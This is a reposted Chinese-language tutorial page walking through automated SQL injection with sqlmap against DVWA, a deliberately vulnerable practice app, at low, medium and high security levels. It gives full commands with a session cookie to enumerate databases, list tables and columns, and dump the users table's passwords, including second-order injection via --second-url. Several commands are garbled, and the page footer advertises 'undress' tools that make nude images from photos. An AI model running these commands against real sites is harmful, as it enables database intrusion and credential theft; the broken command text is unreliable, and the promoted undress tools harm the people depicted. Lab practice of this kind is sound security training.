搜尋
首頁運維安全Sqlmap自動化注入的範例分析

使用sqlmap對dvwa進行自動化注入
 設定dvwa等級為low

  1. #開啟dvwa的SQL Injection(SQL Injection (Blind) ),開啟瀏覽器偵錯,輸入user id並submit,以查看攔截到的請求。

  2. 可以看到是一個GET請求,url「http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#」

  3. 我們直接放到salmap測試一下,用-u指令 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit# "

  4. 可以看到這裡是需要登入的,否則跑不出來。所以我們需要加入一個cookie維持登入

    6.使用burp suite代理程式抓包,取得登入的cookie,新增--dbs 爆資料 -u "http:// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --    cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low"#mycoo

##      7. 我們使用-D xxx指定檢視的資料庫,用--tables檢視該資料庫的所有表格:-u            "http://192.168.1.222:8089/vul  "http://192.168.1.222:8089/vulultiabilities/i/mitid Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

查看跑出來的結果:

#8.我們用-D xxx -T ttt指定檢視的表,用--columns查看表的列

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9.我們用-D xxx查看資料庫, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的資料

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu666rtp07 -D dvwa -T users -C password,user --dump

    #將dvwa安全等級調至medium將抓取的資料包儲存為.txt文件,放到sqlmap的目錄下,直接-r 檔名--dbs(後續的參數自己加即可)

  • 將dvwa 安全等級調至high。由於這次的提交頁面跟回傳結果的頁面不是同一個頁面,所以之前的那種方法在這裡不能用了。要使用二階注入的方法

  • 提交資料的網址
  •              

  • 返回的網址

#       將抓取的封包儲存為.txt文件,放入sqlmap的目錄下,爆炸資料庫,指令: -r           1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --  sql   level 2 --dbs

       

              爆炸表名

  • ##-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -        -batch --level 2 -D dvwa --tables

          
  •       爆列名
          

  • -r 1. "http://192.168.1.222:8089/vulnerabilities/sqli/" 

  •      -- batch --level 2 -D dvwa -T user --columns###### ######     ############     爆字段資料############   #######-r 1.txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" --       batch --level 2 -D dvwa -T users -C user,password --dump############ #### ################一些概念問題:######################二階注入:二階### ###sql注入--second-order有些時候注入點輸入的資料看回傳結果的時候並不是目前的頁面,而是另外的一個頁面, 這時候就需要你指定到哪個頁面取得回應判斷真假。 –second-url 後面跟著一個回傳的頁面的URL位址###################--batch:自動預設配置,不用手動按yes or no##### #
  • level :Sqlmap一共有5個探測等級,預設是1。等級越高,表示偵測時使用的payload也越多。其中5級的payload最多,會自動破解出cookie、XFF等頭部注入。當然,等級越高,偵測的時間也越慢。這個參數會影響測試的注入點,GET和POST的資料都會進行測試,HTTP cookie在level為2時就會測試,HTTP  User-Agent/Referer頭在level為3時就會測試。在不確定哪個參數為注入點時,為了確保準確性,建議設定level為5(速度也隨之變慢)

#

以上是Sqlmap自動化注入的範例分析的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文轉載於:亿速云。如有侵權,請聯絡admin@php.cn刪除

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱門文章

R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
1 個月前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳圖形設置
1 個月前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.如果您聽不到任何人,如何修復音頻
1 個月前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.聊天命令以及如何使用它們
1 個月前By尊渡假赌尊渡假赌尊渡假赌

熱工具

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

SublimeText3 Linux新版

SublimeText3 Linux新版

SublimeText3 Linux最新版

Atom編輯器mac版下載

Atom編輯器mac版下載

最受歡迎的的開源編輯器

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

VSCode Windows 64位元 下載

VSCode Windows 64位元 下載

微軟推出的免費、功能強大的一款IDE編輯器